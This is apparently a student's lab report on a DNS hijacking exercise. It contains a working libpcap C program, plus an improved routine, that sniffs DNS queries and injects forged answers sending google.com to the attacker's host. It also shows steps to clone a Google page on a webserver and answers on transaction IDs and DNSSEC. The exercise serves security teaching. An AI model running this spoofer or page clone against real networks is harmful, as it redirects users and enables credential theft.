  udp->udp_len = htons(sizeof(struct udp_header) + sizeof(struct dns_header) + size_q_name + sizeof(struct dns_query) + sizeof(struct dns_answer));
  ip->ip_len = htons(size_ip + ntohs(udp->udp_len));   // total length

  ip->ip_sum = 0;
  ip->ip_sum = csum((unsigned short *)(new_packet + SIZE_ETH), size_ip);
  udp->udp_sum = 0;
  udp->udp_sum = htons(udp_csum(ntohs(udp->udp_len), (u_short *)&ip->ip_src, (u_short *)&ip->ip_dst, (unsigned short *)udp));

  int result;

  char host[5000];
  dns_name_revert((char *)q_name, host);
  printf("Lookup domain name: %s\n", host);

  if (strstr(host, "google.com") != NULL) {
    result = pcap_sendpacket(handle, new_packet, SIZE_ETH + ntohs(ip->ip_len));

    if (result == 0)
      printf("Packet sent successfully!\n");
    else
      printf("Packet sent failure!\n");
  } else {
    printf("Packet not sent (not a google.com query)!\n");
  }

  return;
}

/* http://www.binarytides.com/c-program-to-get-ip-address-from-interface-name-on-linux/ */
#include <net/if.h>
#include <sys/ioctl.h>

/* Look up the IPv4 address of the interface iface and copy it into buf in dotted form. */
char *get_ip_address(char *iface, char *buf) {
  struct ifreq ifr;
  int fd = socket(AF_INET, SOCK_DGRAM, 0);
  // type of address to retrieve - IPv4 IP address
  ifr.ifr_addr.sa_family = AF_INET;
  // Copy the interface name in the ifreq structure
  strncpy(ifr.ifr_name, iface, IFNAMSIZ - 1);
  ioctl(fd, SIOCGIFADDR, &ifr);
  close(fd);

  // result
  strcpy(buf, inet_ntoa(((struct sockaddr_in *)&ifr.ifr_addr)->sin_addr));
  return buf;
}


int main(int argc, char *argv[]) {
  char *dev = NULL;                /* capture device name */
  char errbuf[PCAP_ERRBUF_SIZE];   /* error buffer */
  char ip_current_address[20];

  char filter_exp[] = "udp dst port 53";  /* filter expression [3]: only DNS queries */
  struct bpf_program fp;           /* compiled filter program (expression) */
  bpf_u_int32 mask;                /* subnet mask */
  bpf_u_int32 net;                 /* ip */
  int num_packets = 0;             /* number of packets to capture (0 = until interrupted) */

  /* check for capture device name on command-line */
  if (argc == 2) {
    dev = argv[1];
  } else if (argc > 2) {
    fprintf(stderr, "error: unrecognized command-line options\n\n");
    //print_app_usage();
    exit(EXIT_FAILURE);
  } else {
    /* find a capture device if not specified on command-line */
    dev = pcap_lookupdev(errbuf);
    if (dev == NULL) {
      fprintf(stderr, "Couldn't find default device: %s\n", errbuf);
      exit(EXIT_FAILURE);
    }
  }

  /* get network number and mask associated with capture device */
  if (pcap_lookupnet(dev, &net, &mask, errbuf) == -1) {
    fprintf(stderr, "Couldn't get netmask for device %s: %s\n", dev, errbuf);
    net = 0;
    mask = 0;
  }

  /* print capture info */
  printf("Device: %s\n", dev);
  printf("Number of packets: %d\n", num_packets);
  printf("Filter expression: %s\n", filter_exp);

  get_ip_address(dev, ip_current_address);
  printf("Current IP Address: %s\n", ip_current_address);

  /* open capture device */
  handle = pcap_open_live(dev, SNAP_LEN, 1, 1000, errbuf);
  if (handle == NULL) {
    fprintf(stderr, "Couldn't open device %s: %s\n", dev, errbuf);
    exit(EXIT_FAILURE);
  }

  /* make sure we're capturing on an Ethernet device [2] */
  if (pcap_datalink(handle) != DLT_EN10MB) {
    fprintf(stderr, "%s is not an Ethernet\n", dev);
    exit(EXIT_FAILURE);
  }

  /* compile the filter expression */
  if (pcap_compile(handle, &fp, filter_exp, 0, net) == -1) {
    fprintf(stderr, "Couldn't parse filter %s: %s\n", filter_exp, pcap_geterr(handle));
    exit(EXIT_FAILURE);
  }

  /* apply the compiled filter */
  if (pcap_setfilter(handle, &fp) == -1) {
    fprintf(stderr, "Couldn't install filter %s: %s\n", filter_exp, pcap_geterr(handle));
    exit(EXIT_FAILURE);
  }

  /* now we can set our callback function; the attacker's own address is handed to it as the user argument */
  pcap_loop(handle, num_packets, got_packet, (u_char *)ip_current_address);

  /* cleanup */
  pcap_freecode(&fp);
  pcap_close(handle);

  printf("\nCapture complete.\n");

  return 0;
}
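got_packet() above trusts the captured query: it finds the end of the name with strlen(), assumes there is exactly one A question, and never looks at the QR bit, so a DNS response it happens to see would be "answered" too; dns_name_revert() also cannot follow compression pointers, which every answer section uses (including the 0xc00c the lab itself writes). The block below is an added example, not the lab's code. It does the DNS-layer part of the forgery with bounds checks (the Ethernet/IP/UDP swapping and checksums are unchanged from the listing above), decodes names with pointer support, and ends with the match test a stub resolver applies to an incoming answer, which is what the race against host2 has to satisfy. The captured query bytes and the attacker address 10.0.0.3 are constructed for the example.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* A query for www.google.com as it arrives in the UDP payload: id 0xAABB,
 * flags 0x0100, QDCOUNT 1, question www.google.com A IN. Constructed. */
const uint8_t kCapturedQuery[] = {
    0xaa, 0xbb, 0x01, 0x00, 0x00, 0x01, 0, 0, 0, 0, 0, 0,
    3, 'w', 'w', 'w', 6, 'g', 'o', 'o', 'g', 'l', 'e', 3, 'c', 'o', 'm', 0,
    0x00, 0x01, 0x00, 0x01
};
const size_t kCapturedQueryLen = sizeof kCapturedQuery;

/* Offset just past the first question (name, QTYPE, QCLASS); 0 if the message
 * is truncated, has no question, or uses a compression pointer in the question
 * name, which a query never needs. */
size_t dns_question_end(const uint8_t *m, size_t len)
{
    size_t pos = 12;
    if (len < 12 || ((m[4] << 8) | m[5]) == 0)
        return 0;
    for (;;) {
        if (pos >= len) return 0;
        uint8_t l = m[pos++];
        if (l == 0) break;
        if ((l & 0xc0) || pos + l > len) return 0;
        pos += l;
    }
    return pos + 4 <= len ? pos + 4 : 0;
}

/* Decode the name at off into dotted form, following compression pointers
 * (RFC 1035 4.1.4). A pointer may only point backwards, which rules out loops.
 * Returns the offset just past the name as stored at off, or 0 on bad input. */
size_t dns_name_decode(const uint8_t *m, size_t len, size_t off, char *out, size_t cap)
{
    size_t pos = off, end = 0, o = 0;
    for (;;) {
        if (pos >= len) return 0;
        uint8_t l = m[pos];
        if ((l & 0xc0) == 0xc0) {                       /* 11xxxxxx: pointer */
            size_t target;
            if (pos + 1 >= len) return 0;
            target = ((l & 0x3f) << 8) | m[pos + 1];
            if (target >= pos) return 0;                /* forward/self pointer: reject */
            if (!end) end = pos + 2;
            pos = target;
            continue;
        }
        if (l & 0xc0) return 0;                         /* 01/10 prefixes unsupported */
        pos++;
        if (l == 0) { if (!end) end = pos; break; }
        if (pos + l > len || o + l + 2 > cap) return 0;
        if (o) out[o++] = '.';
        memcpy(out + o, m + pos, l);
        o += l; pos += l;
    }
    out[o] = '\0';
    return end;
}

/* The lab's forged answer built from the captured query: same ID, flags 0x8180,
 * the question copied, one A record whose NAME is the pointer 0xc00c to the
 * question name. Refuses anything that is not a standard query with a single
 * A/IN question. Returns the response length, or 0. */
size_t dns_forge_a_response(const uint8_t *q, size_t qlen, const uint8_t fake_ip[4],
                            uint32_t ttl, uint8_t *out, size_t cap)
{
    size_t qend = dns_question_end(q, qlen);
    uint16_t flags, qdcount;
    uint8_t *a;
    if (!qend) return 0;
    flags = (q[2] << 8) | q[3];
    qdcount = (q[4] << 8) | q[5];
    if ((flags & 0x8000) || ((flags >> 11) & 0xf) != 0 || qdcount != 1) return 0;
    if (q[qend - 4] != 0 || q[qend - 3] != 1 || q[qend - 2] != 0 || q[qend - 1] != 1) return 0;
    if (qend + 16 > cap) return 0;
    memcpy(out, q, qend);                     /* header + question, ID preserved */
    out[2] = 0x81; out[3] = 0x80;             /* QR, RD, RA, RCODE 0 */
    out[6] = 0; out[7] = 1;                   /* ANCOUNT = 1 */
    memset(out + 8, 0, 4);                    /* NSCOUNT, ARCOUNT = 0 */
    a = out + qend;
    a[0] = 0xc0; a[1] = 0x0c;                 /* NAME: pointer to offset 12 */
    a[2] = 0; a[3] = 1; a[4] = 0; a[5] = 1;   /* TYPE A, CLASS IN */
    a[6] = (uint8_t)(ttl >> 24); a[7] = (uint8_t)(ttl >> 16);
    a[8] = (uint8_t)(ttl >> 8);  a[9] = (uint8_t)ttl;
    a[10] = 0; a[11] = 4;                     /* RDLENGTH */
    memcpy(a + 12, fake_ip, 4);               /* RDATA */
    return qend + 16;
}

/* What the client checks before accepting an answer: transaction ID equal, QR
 * set, question byte-identical (source port and address are checked by the
 * UDP/IP layer). An attacker who did not see the query has to guess the ID. */
int dns_response_matches_query(const uint8_t *q, size_t qlen, const uint8_t *r, size_t rlen)
{
    size_t qend = dns_question_end(q, qlen);
    if (!qend || rlen < qend || q[0] != r[0] || q[1] != r[1] || !(r[2] & 0x80))
        return 0;
    return memcmp(q + 12, r + 12, qend - 12) == 0;
}

int main(void)
{
    const uint8_t fake_ip[4] = {10, 0, 0, 3};             /* host3's address, constructed */
    uint8_t resp[512];
    char name[256];
    size_t rlen;
    if (!dns_name_decode(kCapturedQuery, kCapturedQueryLen, 12, name, sizeof name)
        || strstr(name, "google.com") == NULL)
        return 0;                                          /* not a query we want to hijack */
    rlen = dns_forge_a_response(kCapturedQuery, kCapturedQueryLen, fake_ip, 1499, resp, sizeof resp);
    printf("forged %zu-byte answer for %s, accepted by client: %d\n", rlen, name,
           dns_response_matches_query(kCapturedQuery, kCapturedQueryLen, resp, rlen));
    return 0;
}
```

In the attack program this replaces everything from the dns pointer onwards in got_packet(): pass new_packet + SIZE_ETH + size_ip + 8 and the UDP payload length as the query, write the result back at the same offset, then recompute udp_len, ip_len and the two checksums exactly as the listing does.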

Explain:

- Modified code 1: swap the source and destination MAC addresses
  // HERE I SWITCH THE MAC SOURCE
  char mac[6];
  /* print source and destination MAC addresses */
  printf("Switch the source and destination MAC addresses\n");
  printf("(Before) From: %s\n", ether_ntoa((struct ether_addr *)ethernet->ether_shost));
  printf("(Before) To: %s\n", ether_ntoa((struct ether_addr *)ethernet->ether_dhost));
  // TO BE MODIFIED 1:
  bcopy(ethernet->ether_shost, mac, 6);
  bcopy(ethernet->ether_dhost, ethernet->ether_shost, 6);
  bcopy(mac, ethernet->ether_dhost, 6);

  printf("(After) From: %s\n", ether_ntoa((struct ether_addr *)ethernet->ether_shost));
  printf("(After) To: %s\n", ether_ntoa((struct ether_addr *)ethernet->ether_dhost));

- Modified code 2: swap the IP addresses
  // TO BE MODIFIED 2: your code to swap the IP addresses
  struct in_addr ip_addr_tmp;
  ip_addr_tmp = ip->ip_src;
  ip->ip_src = ip->ip_dst;
  ip->ip_dst = ip_addr_tmp;

- Modified code 3: swap the UDP ports
  // TO BE MODIFIED 3: your code to swap the udp ports
  u_short port_tmp;
  port_tmp = udp->udp_sport;
  udp->udp_sport = udp->udp_dport;
  udp->udp_dport = port_tmp;

- Modified code 4: put the attacker's own IP address in the answer
  /* http://www.binarytides.com/c-program-to-get-ip-address-from-interface-name-on-linux/ */
  #include <net/if.h>
  #include <sys/ioctl.h>

  char *get_ip_address(char *iface, char *buf) {
    struct ifreq ifr;
    int fd = socket(AF_INET, SOCK_DGRAM, 0);
    // type of address to retrieve - IPv4 IP address
    ifr.ifr_addr.sa_family = AF_INET;
    // Copy the interface name in the ifreq structure
    strncpy(ifr.ifr_name, iface, IFNAMSIZ - 1);
    ioctl(fd, SIOCGIFADDR, &ifr);
    close(fd);

    // result
    strcpy(buf, inet_ntoa(((struct sockaddr_in *)&ifr.ifr_addr)->sin_addr));
    return buf;
  }

  In got_packet(u_char *args, const struct pcap_pkthdr *header, const u_char *packet):
    ...
    // TO BE MODIFIED 4: change the ip address as required
    dns_as->a_addr.s_addr = inet_addr((char *)args);
    ...

  In main(int argc, char *argv[]):
    ...
    char ip_current_address[20];
    ...
    get_ip_address(dev, ip_current_address);
    printf("Current IP Address: %s\n", ip_current_address);
    ...
    /* now we can set our callback function */
    pcap_loop(handle, num_packets, got_packet, (u_char *)ip_current_address);
    ...

- Modified code Extra: only answer queries for google.com
  char *dns_name_revert(char *q_name, char *host) {
    int count, len, first, i;
    count = 0; len = 0;
    first = q_name[count]; count++;
    while (first > 0) {
      for (i = 0; i < first; i++) {
        host[len] = q_name[count];
        len++; count++;
      }
      first = q_name[count]; count++;
      if (first > 0) {
        host[len] = '.';
        len++;
      }
    }
    host[len] = 0;
    return host;
  }

  In got_packet(u_char *args, const struct pcap_pkthdr *header, const u_char *packet):
    ...
    char host[5000];
    dns_name_revert((char *)q_name, host);
    printf("Lookup domain name: %s\n", host);

    if (strstr(host, "google.com") != NULL) {
      result = pcap_sendpacket(handle, new_packet, SIZE_ETH + ntohs(ip->ip_len));

      if (result == 0)
        printf("Packet sent successfully!\n");
      else
        printf("Packet sent failure!\n");
    } else {
      printf("Packet not sent (not a google.com query)!\n");
    }
    ...

Task 2: Install a webserver on host3, create a home page to make it look like www.gmail.com

Answer: On host3:
  sudo apt-get install apache2
  sudo service apache2 start
  cd /var/www/
  sudo su root
  wget google.com -O index.html

Task 3: Test and make sure your attack works
- On host3, run: sudo ./dntai_dns_attack

- On host1, open a terminal.
• Type nslookup google.com (the attacker redirects the DNS answer for google)
• Type nslookup vnexpress.net (no google.com in the name, so the attack program does not answer and the real answer arrives)

• Open Firefox, type the address google.com

• Screen on Host 1

Question 1: Compare the DNS request and DNS response with respect to
a) Source MAC address and Destination MAC address
b) IP source, IP destination
c) source port, destination port

Answer
• DNS Request vs DNS Response: MAC address
Request
Response

• DNS Request vs DNS Response: IP address
Request
Response

• DNS Request vs DNS Response: port
Request
Response

• Result: between the DNS request and the DNS response, the MAC addresses, IP addresses and ports are swapped between source and destination. That is why the attack program only has to swap those three pairs in the captured query and keep everything else, including the transaction ID.

Question 2: What is the role of the Transaction ID field of the DNS packet?

Answer: The Transaction ID is a 16-bit field identifying a specific DNS transaction. The transaction ID is created by the message originator and is copied by the responder into its response message. Using the transaction ID, the DNS client can match responses to its requests. The attack program gets the right ID for free because it copies the captured query; an attacker who cannot see the query has to guess it, so the client should pick it at random rather than counting up.

Question 3: Find a solution to prevent the DNS session hijacking attack

Answer: A solution to prevent the DNS session hijacking attack is DNSSEC: The Domain Name System Security Extensions (DNSSEC) is a suite of Internet Engineering Task Force (IETF) specifications for securing certain kinds of information provided by the Domain Name System (DNS) as used on Internet Protocol (IP) networks. It is a set of extensions to DNS which provide to DNS clients (resolvers) origin authentication of DNS data, authenticated denial of existence, and data integrity, but not availability or confidentiality. (Wikipedia)
DNSSEC only helps here if the resolver on host1 validates the signatures: the forged packet still arrives first, but an answer for a signed zone that carries no valid signature is then rejected. Without validation, the only things the forger has to match are the transaction ID and the client's source port, so both must be unpredictable.